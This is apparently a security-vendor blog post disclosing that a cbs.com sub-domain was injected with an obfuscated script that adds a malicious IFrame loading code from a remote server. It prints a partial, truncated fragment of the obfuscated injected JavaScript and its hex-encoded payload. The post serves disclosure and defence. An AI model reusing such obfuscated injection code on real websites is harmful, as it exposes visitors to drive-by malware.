Today Finjan’s MCRC has revealed that the famous radio and television network, CBS, was compromised as a result of malicious activity.
According to Alexa.com the Cbs.com website has a traffic rank of: 964
The cybercriminals added a malicious obfuscated script to the infected page. The injected script injects a malicious IFrame to the page.
Obfuscated script injected on cbs.com sub-domain
The injected IFrame automatically loads another malicious script from a remote server controlled by criminals in Russia, causing a possible installation of malware on the unsuspecting client machine. The remote Russian server is already down.
The obfuscated code as it appears on cbs.com sub-domain in the source:
return(parseInt(v4818cf7754fde,v4818cf77557d4()));}function v4818cf77563de(v4818cf77567c7)
{ function v4818cf77577b8 () {var v4818cf7757faf=2; return v4818cf7757faf;}
var v4818cf7756bc2='';for([REMOVED]
v4818cf77577b8()))));}return v4818cf7756bc2;} document.all('yby').value=(v4818cf77563de
('3C5343524950543E77696E[REMOVED]3D363332206865696768743D343037207374796
[REMOVED]543E’));
// ]]></script>
The de-obfuscated script:
// ]]></script>
The malicious Russian server, from which the IFrame pulled the malicious code:
As always, the MCRC team immediately informed CBS.com of the infection.
This case shows us once again that infecting legitimate websites with malicious obfuscated code remains a favorite and highly effective attack vector for hackers!
We have not seen the last of it yet……….
Posted by Moshe Basanchig